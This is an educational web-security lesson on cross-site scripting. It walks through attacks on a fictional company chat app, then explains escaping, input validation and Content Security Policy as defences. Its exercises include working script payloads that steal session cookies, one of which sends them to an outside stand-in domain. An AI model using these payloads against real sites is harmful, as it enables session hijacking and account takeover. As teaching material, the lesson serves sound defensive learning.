Cross-site scripting (XSS)
Executing untrusted code in a trusted context.
What is XSS?
Cross-site scripting (or XSS) is a security vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website. Since the script appears to come from a trusted website, the browser cannot distinguish it from a legitimate script.
About this lesson
In this lesson we will demonstrate how an XSS attack can play out in a chat application. Next, we will dive deeper and explain the various forms of XSS. Finally, we will study vulnerable code and learn how to fix it.
But before we jump into the lesson, have you ever heard of a self-retweeting tweet?
A self-retweeting tweet
In 2014, an Austrian teenager @firoxl was experimenting with his feed on Twitter, trying to make it display the Unicode ‘heart’ character. By doing so, he inadvertently discovered that Twitter’s feed was vulnerable to an XSS attack! @firoxl immediately reported the issue to Twitter, but it was too late. His discovery was already making the rounds on social media.
Less than two hours after @firoxl’s discovery, a German IT student @derGeruhn published a tweet that exploited XSS to ... retweet itself. Thus, the self-retweeting tweet was released into the world. It retweeted itself hundreds of thousands of times and affected thousands of Twitter accounts, including @NYTimes and @BBCBreaking. To end its reign, Twitter had to take their whole feed offline.
On the left you will find an image that shows the content of the self-retweeting tweet. The tweet contains malicious JavaScript code which gets executed every time someone views the tweet in their feed. The script accesses the HTML of the Twitter page, finds the “retweet” button, and presses it to retweet itself.
To achieve its nefarious purposes, the script exploits an XSS vulnerability. Not sure how it works? Read on!
Vulnerable chat application
A company called startup.io decided to deploy an internal chat application for their employees. However, instead of using Slack, Discord or similar, the company chose to create its own chat service.
You are an engineer working for startup.io, and you’ve just learnt about the self-retweeting tweet that plagued Twitter a few years ago. You are curious to see if you could exploit your company’s chat web application in a similar way. You inform your in-house security team and your manager about your intentions, and then you get to work.
Say hi to Emily
To exploit the application, you will be using a conversation with Emily, a fellow startup.io engineer. First, let’s be polite and inform Emily what we will be doing by sending her the following message: Hey! I will be stealing your cookies. Is that ok?
Hack 1: change the background color of the chat application
Since Emily seems relaxed about this whole stealing thing, let’s get down to business. You recall that in Twitter’s hack, the feed was exploited by tweeting a <script> tag. You decide to do something similar. You choose to try something easy first – changing the background color of the chat application. Send Emily the following message:
<style> * { background-color: #FFFF00 } </style>
Woohoo, it worked! The background color of your chat changed to yellow. Judging from Emily’s reaction, you also managed to modify the background color of her chat client!
Modifying the HTML, CSS, or JavaScript of a website that you view in your browser is nothing special–you can do it any time by poking in your browser’s console. However, changing what other people see or run within their browsers is a severe security issue!
If this new yellow background hurts your eyes as much as it hurts Emily’s, try changing it back to the default color (hex code #F7F3F3) by sending the following message:
<style> * { background-color: #F7F3F3 } </style>
Hack 2: stealing cookies
A simple hack worked, so it’s time to be more vicious and actually steal some cookies! Try sending the following message:
<script>document.getElementById("messageText").innerHTML=document.cookie;document.getElementById("sendMessage").click();</script>
The first statement of the script retrieves cookies set by the chat web application and puts the cookies into a message box. The second statement clicks on the “send message” button.
Try sending the script as a message in the chat app. You should see two long strings with a session token popping up in the chat window, one sent by you and one sent by Emily.
Congratulations! You’ve managed to inject a malicious script into a web application, and that malicious script was run inside another user’s browser. As a result, you’ve stolen another user’s session id, which you could use to impersonate that user and do further harm.
In this example, we crafted a JavaScript payload that messaged the cookies to the chat. Unfortunately, Emily would quickly realize that something is off. In a more realistic scenario, you would want to be more stealthy about your activities. For example, you could send the following message:
<script>new Image().src="http://yourdomain.io/"+document.cookie;</script>
This script constructs an invisible image object which calls the provided src URL the moment the image is created. Effectively, we issue an HTTP request with the cookie’s content in the URL to a domain of our choice. All you need to do is log all incoming requests to that domain. This way, it is much less likely that Emily would notice anything suspicious.
Same-origin policy
To understand what happened with the chat application, we need to take a quick detour and explain how the browser executes HTML and JavaScript. Each time you visit a website, your browser downloads HTML, CSS, and JavaScript from the server that hosts the website. The browser interprets and displays HTML and CSS and executes JavaScript.
JavaScript is a powerful programming language–for example, it is entirely possible to use it to mine bitcoins inside your browser. However, by design, when a piece of JavaScript is downloaded from a website, it can only access secrets (e.g. cookies) associated with that website. For instance, JavaScript code downloaded from startup.io cannot access cookies set by yourbank.com. If it could, it would be straightforward to steal sensitive information persisted by other websites, such as session tokens.
This isolation is called the “same-origin policy”, and it is enforced by the browser. In a nutshell, XSS is a vulnerability that breaks the same-origin policy. And that’s what we did when we compromised the chat application. To understand what exactly happened, let’s take a look at the server code responsible for storing and displaying a chat message.
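The lesson’s original code sample is not reproduced here, but a vulnerable message-rendering function might look like the following minimal sketch (the function and field names are illustrative assumptions, not the actual startup.io code):

```javascript
// Hypothetical sketch of vulnerable server-side rendering.
// The message text is concatenated directly into the HTML with no
// escaping, so any <script> tag a user sends becomes part of the page
// and runs in every viewer's browser under the chat site's origin.
function generateMessageHTML(message) {
  return `<div class="message">
    <span class="sender">${message.senderEmail}</span>
    <p>${message.text}</p>
  </div>`;
}

// An attacker-controlled message flows straight into the markup:
const html = generateMessageHTML({
  senderEmail: "attacker@startup.io",
  text: '<script>new Image().src="http://yourdomain.io/"+document.cookie;</script>',
});
console.log(html.includes("<script>")); // the payload survives intact
```

Because the payload arrives with the same origin as the rest of the page, the browser grants it full access to the site’s cookies, which is exactly what the exploit above abused.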
What is the impact of XSS?
XSS allows hackers to inject malicious JavaScript into a web application. Such injections are extremely dangerous from the security perspective, and can lead to:
- Stealing sensitive information, including session tokens, cookies or user credentials
- Injecting multiple types of malware (e.g. worms) into the website
- Changing the website appearance to trick users into performing undesirable actions
In addition, XSS is likely the most common web vulnerability. Do not take it lightly. Read on to learn how to mitigate XSS in your application.
1. Find places where user input gets injected into a response
XSS is extremely popular for a reason: we programmers very often inject user-supplied data into the responses we send back to users. The first step to mitigate XSS is to find all places in your code where this pattern occurs. Input data might be coming from a database or directly from a user request. Any data which might have originated from a user at any point in the past is a suspect.
This is a daunting task and requires you to review your code carefully. Luckily, security scanners such as Snyk Code can automate most of the work for you.
2. Escape the output
Having identified all the places where XSS might be happening, it’s time to get your hands dirty and code your way out of danger. The first and the most important XSS mitigation step is to escape your HTML output. To do that, you should HTML-encode all dangerous characters in the user-controlled data before injecting that data into your HTML output.
For example, when HTML-encoded, the character < becomes &lt;, the character & becomes &amp;, and so on. This way, the browser will handle the encoded characters safely, i.e. it will not treat them as part of the HTML structure of your page.
Remember to encode all dangerous characters. Don’t assume only a subset of characters needs to be escaped for your specific use case. Bad guys are very creative and will always find ways to bypass your assumptions.
Instead of writing an escape function by yourself, use a well-proven library such as lodash.escape.
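As a rough illustration of what such a library does (this is a minimal sketch, not the lodash implementation), an HTML-escaping function could look like this:

```javascript
// Minimal HTML-escaping sketch. In production, prefer a proven library
// such as lodash.escape instead of rolling your own.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;") // must run first, or later entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(escapeHtml('<script>alert("xss")</script>'));
// → &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Note the ordering: the ampersand is escaped before the other characters, so that the & in a freshly produced entity like &lt; is not escaped a second time.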
3. Perform input validation
Be as strict as possible with the data you receive from your users. Before including user-controlled data in an HTTP response or writing it to a database, validate it is in the format you expect. Never rely on blocklisting—the bad guys will always find ways to bypass it!
For instance, in our chat application, we expect the messageId to be a valid UUID and the senderEmail to be a valid email. Note that in the example we changed generateMessageHTML to generateSenderHTML. This demonstrates two layers of defence to prevent XSS with the senderEmail parameter: we both validate it before saving it to a database and later escape it when injecting it into HTML.
We can use validator.js, which has validation functions for many common data types.
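To make the idea concrete, here is a simplified sketch of such validation. In real code you would call validator.js’s validator.isUUID and validator.isEmail; the regexes below (especially the deliberately rough email pattern) are illustrative assumptions only:

```javascript
// Simplified validation sketch. Prefer validator.isUUID / validator.isEmail
// from validator.js in real code; these regexes are rough illustrations.
const UUID_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i;
const EMAIL_RE = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

function validateMessage({ messageId, senderEmail }) {
  if (!UUID_RE.test(messageId)) throw new Error("messageId is not a valid UUID");
  if (!EMAIL_RE.test(senderEmail)) throw new Error("senderEmail is not a valid email");
}

// A payload smuggling HTML into the email field is rejected up front:
try {
  validateMessage({
    messageId: "123e4567-e89b-12d3-a456-426614174000",
    senderEmail: "<script>alert(1)</script>@evil.io",
  });
} catch (e) {
  console.log("rejected:", e.message); // rejected: senderEmail is not a valid email
}
```

Rejecting malformed input early means the dangerous characters never reach the database or the HTML output in the first place.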
It is mandatory to perform type validation of user input before writing it to a database. However, it is also strongly recommended to validate data after reading it from the database. This can save us when the database gets compromised, and the malicious data gets injected through means other than the vulnerable API we secured in the previous paragraph. To validate data read from a database, you can use the validation techniques we presented above. Alternatively, we recommend using trusted database libraries that perform type validation out of the box, for example, ORM libraries.
4. Don’t put user input in dangerous places
The above mitigation is effective against situations where user input is used as the content of an HTML element (e.g. <div> user_input </div> or <p> user_input </p>). However, there are certain locations where you should never put user-controlled input. These locations include:
- Inside the <script> tag
- Inside CSS (e.g. inside the <style> tag)
- Inside an HTML attribute (e.g. <div attr=user_input>)
There are some exceptions to the above rules, but explaining them goes beyond the scope of this lesson. If you do need to place user-controlled input inside any of the listed locations, please follow the OWASP XSS Prevention Cheat Sheet for more detailed advice.
Content Security Policy (CSP)
A Content Security Policy (CSP) is a security feature implemented by web browsers to mitigate various types of web-based attacks, such as cross-site scripting (XSS) and data injection attacks. It is a set of directives that a web application can define to control which sources of content are considered legitimate and safe to load and execute. These sources can include scripts, stylesheets, images, fonts, and other types of resources.
The main purpose of CSP is to prevent unauthorized or malicious code from being executed in the context of a web page. It helps in reducing the impact of vulnerabilities like XSS attacks, where attackers try to inject malicious scripts into a website to steal user data or perform other malicious actions. By specifying the sources of allowed content, CSP instructs the browser to only load content from trusted origins and domains, thereby blocking any content from untrusted sources.
CSP policies are typically defined using a combination of content source directives in the HTTP header of the web page or within a meta tag in the HTML. The policy directives can specify which domains are allowed for scripts, styles, images, fonts, and more. For example, you might define a CSP policy that only allows scripts to be loaded from the same origin as the web page itself or from a few specified trusted domains.
Here's a simplified example of a CSP policy:
Content-Security-Policy: default-src 'self' https://trusted-site.example;
In this example, the default-src directive specifies that content (such as scripts) can be loaded from the same origin ('self') and from https://trusted-site.example, but any other sources will be blocked.
CSP is an important security mechanism that web developers can use to reduce the attack surface of their applications and protect users from various types of web vulnerabilities. It's worth noting that while CSP provides strong security benefits, it can also be complex to implement correctly, as it requires careful consideration of the sources and dependencies of content within a web application.
Keep learning
To learn more about XSS, check out some other great content produced by Snyk:
- Our article which explains reflected and DOM-based XSS in more detail
- A real-life example of XSS found in a popular JavaScript package
- Our most recent State of Open Source Security report to see empirical data on how widespread XSS is